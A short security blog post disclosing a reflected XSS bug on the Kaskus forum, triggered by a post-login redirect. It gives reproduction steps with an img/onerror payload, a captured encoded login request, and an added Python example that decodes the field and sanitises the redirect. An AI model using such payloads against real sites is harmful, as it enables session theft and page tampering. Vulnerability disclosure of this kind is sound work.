XSS On Kaskus

This is an old bug I found in 2016. I am writing about it on my new blog to share what I found, because I think this bug is very interesting and unique.

Description

This bug is unique because the XSS is exposed when the user is redirected to the previous page after login.

Steps To Reproduce

  • Go to http://www.kaskus.co.id/thread/57a47e691cbfaa092b8b456a/?ref=header&med=header
  • Change the parameter to "><img+src%3Dx+onerror%3Dprompt('XSS/By/LocalHost')%3B>
  • Log in with the widget at the top and you will be redirected
  • And the XSS will be exposed

HTTP Header response:

username=sebutsajanos&password=&md5password=&md5password_utf=&securitytoken=1470955602-c2079dd69c8f65d455e977727407176b&url=%252Fthread%252F57a47e691cbfaa092b8b456a%252F%253Fref%253Dheader%2526med%253D%252522%25253E%25253Cimg%252Bsrc%25253Dx%252Bonerror%25253Dprompt%2528%252527XSS%252FBy%252FLocalHost%252527%2529%25253B%25253E
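
An added example, not code from the original post or from Kaskus: it peels the nested percent-encoding off the `url` field captured above to show where the markup sits, then shows one way a post-login redirect can neutralise it by accepting only a local path, re-encoding it, and HTML-escaping it. The helper names `peel` and `safe_return_href` are hypothetical, and it is an assumption that the value ends up in an HTML attribute; the page does not show the actual sink.

```python
import html
from urllib.parse import parse_qsl, quote, unquote, urlencode, urlsplit

# `url` field copied from the login request body shown on this page.
CAPTURED_URL_FIELD = (
    "%252Fthread%252F57a47e691cbfaa092b8b456a%252F%253Fref%253Dheader%2526med"
    "%253D%252522%25253E%25253Cimg%252Bsrc%25253Dx%252Bonerror%25253Dprompt"
    "%2528%252527XSS%252FBy%252FLocalHost%252527%2529%25253B%25253E"
)


def peel(value, max_rounds=5):
    """Percent-decode until the value stops changing; return (decoded, rounds)."""
    for rounds in range(max_rounds + 1):
        decoded = unquote(value)
        if decoded == value:
            return value, rounds
        value = decoded
    raise ValueError("too many encoding layers")


def safe_return_href(field):
    """Hypothetical helper: turn the `url` field into a value that is safe
    to place in an HTML attribute such as href="..." (assumed sink)."""
    decoded, _ = peel(field)
    parts = urlsplit(decoded)
    # Only same-site relative paths are accepted as a post-login target.
    if parts.scheme or parts.netloc or not parts.path.startswith("/"):
        raise ValueError("return target must be a local path")
    # Re-encode path and query so markup characters become %XX again ...
    target = quote(parts.path)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    if pairs:
        target += "?" + urlencode(pairs)
    # ... then escape for the HTML context the value is written into.
    return html.escape(target, quote=True)


if __name__ == "__main__":
    decoded, rounds = peel(CAPTURED_URL_FIELD)
    print(rounds, decoded)
    print(safe_return_href(CAPTURED_URL_FIELD))
```

The captured field needs three decoding rounds before the raw `"><img ...>` markup appears, which is why a filter that inspects the value after a single decode sees only percent signs.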

Note:

Kaskus's response was very quick, and I got SWAG from them.